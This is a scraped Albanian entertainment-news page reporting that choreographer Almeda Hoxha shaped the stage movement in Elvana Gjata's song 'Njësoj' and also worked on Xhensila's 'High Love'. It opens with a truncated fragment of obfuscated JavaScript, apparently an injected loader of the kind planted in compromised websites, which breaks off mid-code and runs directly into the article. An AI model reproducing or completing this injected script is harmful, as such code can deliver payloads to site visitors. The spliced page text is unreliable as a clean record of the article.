;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Emri jo fort i njohur që qëndron prapa shkëlqimit të Elvanës në ‘Njësoj’

By

‘Një pritje e gjatë por që ia ka vlejtur’. Kjo ishte përshtypja e shumë fansave të këngëtares Elvana Gjata kur kjo e fundit solli projektin e ri ‘Njësoj’, gati në një hark kohor prej një viti nga kënga paraprake.

Në aspektin vokal, të pamjes dhe vizuelizimit, një shkëlqim i Elvanës nuk ishte diçka për t’u befasuar por në ‘Njësoj’ erdhën edhe risi.

Këngëtarja mes tjerash, spikati edhe për koreografitë me lëvizjet skenike që i shkojnë përshtati një artisteje që mban epitetin e një dive në sytë e shumëkujt.

E ‘fajtorja’ për këtë është koreografja Almeda Hoxha që ka bashkëpunuar me Elvanën në projektin e ri.

Ndryshe, puna e saj është reflektuar edhe në këngën e re të Xhensilës ‘High Love’.

Këngëtaret e njohura duket po i kushtojnë vëmendje një detaji shumë të rëndësishëm dhe kjo duhet komplimentuar. /Prive.al/

Artikuj të ngjashëm